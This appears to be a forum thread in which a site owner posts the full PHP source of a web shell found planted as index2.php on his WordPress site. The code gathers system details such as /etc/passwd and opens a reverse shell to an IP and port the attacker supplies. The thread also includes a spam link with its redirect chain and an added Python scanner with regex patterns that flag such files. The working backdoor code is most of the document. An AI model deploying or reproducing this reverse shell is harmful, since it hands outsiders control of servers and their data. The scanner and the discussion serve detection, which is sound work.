sakunne
HV veteran
joined: 15.12.2004
|
22.03.2017 14:56:17
Skype and WP spam |
|
|
1. A file "index2.php" appeared on the WP site with the following content
Spoiler
<?php
if(isset($_POST['who'])) {
$ans = array();
$ans['release'] = @shell_exec("cat /etc/*release");
$ans['uname'] = @shell_exec("uname -a");
$ans['id'] = @shell_exec("id");
$ans['pwd'] = @shell_exec("pwd");
$ans['passwd'] = @shell_exec("cat /etc/passwd");
$ans['gcc'] = @shell_exec("which gcc");
$ans['make'] = @shell_exec("which make");
$ans['perl'] = @shell_exec("which perl");
$ans['python'] = @shell_exec("which python");
$ans['wget'] = @shell_exec("which wget");
$ans['links'] = @shell_exec("which links");
$ans['lynx'] = @shell_exec("which lynx");
$ans['curl'] = @shell_exec("which curl");
$ans['ifconfig'] = @shell_exec("/sbin/ifconfig");
echo base64_encode(serialize($ans));
exit;
} else if(!isset($_POST['init'])) {
exit;
}
ini_set('display_errors', 'on');
ini_set('log_error', 'off');
error_reporting(E_ALL);
set_time_limit(0);
$VERSION = "1.0";
list($ip, $port) = unserialize(base64_decode($_POST['init']));
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if(function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if(posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if(!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while(1) {
// Check for end of TCP connection
if(feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if(feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if(in_array($sock, $read_a)) {
if($debug)
printit("SOCK READ");
$input = fread($sock, $chunk_size);
if($debug)
printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if(in_array($pipes[1], $read_a)) {
if($debug)
printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if($debug)
printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if(in_array($pipes[2], $read_a)) {
if($debug)
printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if($debug)
printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit($string) {
if(!$daemon) {
print "$string\n";
}
}
|
Just for interest and for commenting
2. Lately I have been receiving messages like this from my Skype contacts
https://www.baidu.com/link?url=zLHau35SxoefdU9nD2ySFgm6k9NL33U5qf7YkQ-K-Y3&id=sakunne |
Has anyone tried what the latter does, or is anyone interested?
last edited by sakunne 22.03.2017 15:22:07, edited 1 time |
|
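A static check a site owner could run over a WordPress tree to flag files shaped like the index2.php listing in the post above. This is an added example, not part of the original thread: the indicator names, the verdict levels and the extra PHP function names beyond those in the listing are assumptions chosen for illustration, and the benign sample is constructed.

```python
import re
from pathlib import Path

# Indicators modelled on the index2.php listing; a few sibling PHP functions
# (passthru, popen, pfsockopen, ...) are added as a generalisation.
INDICATORS = {
    "command_exec": re.compile(
        r"\b(?:shell_exec|proc_open|passthru|popen|system|exec)\s*\(", re.I),
    "outbound_socket": re.compile(
        r"\b(?:fsockopen|pfsockopen|stream_socket_client)\s*\(", re.I),
    "request_deserialize": re.compile(
        r"unserialize\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)", re.I),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i"),
    "daemonise": re.compile(r"\b(?:pcntl_fork|posix_setsid)\s*\(", re.I),
    "no_time_limit": re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I),
}

def scan_source(source):
    """Return the sorted names of indicators present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))

def verdict(hits):
    """Grade a hit list: 'high', 'review' or 'clean'."""
    hits = set(hits)
    # A command runner next to an outbound socket is the reverse-shell shape;
    # unserialize() on request data is dangerous on its own.
    if {"command_exec", "outbound_socket"} <= hits or "request_deserialize" in hits:
        return "high"
    return "review" if hits else "clean"

def scan_tree(root):
    """Scan every *.php file below root; return {path: (verdict, hits)} for hits."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = (verdict(hits), hits)
    return findings

# Four lines quoted from the listing in the post (not a complete file).
SAMPLE_FROM_POST = r"""
list($ip, $port) = unserialize(base64_decode($_POST['init']));
$shell = 'uname -a; w; id; /bin/sh -i';
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$process = proc_open($shell, $descriptorspec, $pipes);
"""
# Constructed benign theme code for comparison.
SAMPLE_BENIGN = r"""<?php
function my_theme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'my_theme_setup');
"""

if __name__ == "__main__":
    for label, src in (("post", SAMPLE_FROM_POST), ("benign", SAMPLE_BENIGN)):
        print(label, verdict(scan_source(src)), scan_source(src))
```

Plugins that legitimately call `exec()` or open sockets will land in "review", so treat the output as a triage list to compare against a clean copy of WordPress core and the installed plugins, not as proof of compromise.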
A.S.
HV Guru
joined: 26.10.2003
|
22.03.2017 15:19:01
|
|
|
An ordinary https://www.baidu.com/ search link; you end up on some pointless site, which in turn redirects you onward. http://letprint.ru/ => http://todaydates31.com/. There you find out how to get rich quick.
|
olavsu1
guest
|
26.03.2017 23:28:37
|
|
|
With that first thing, the server goes under someone else's control...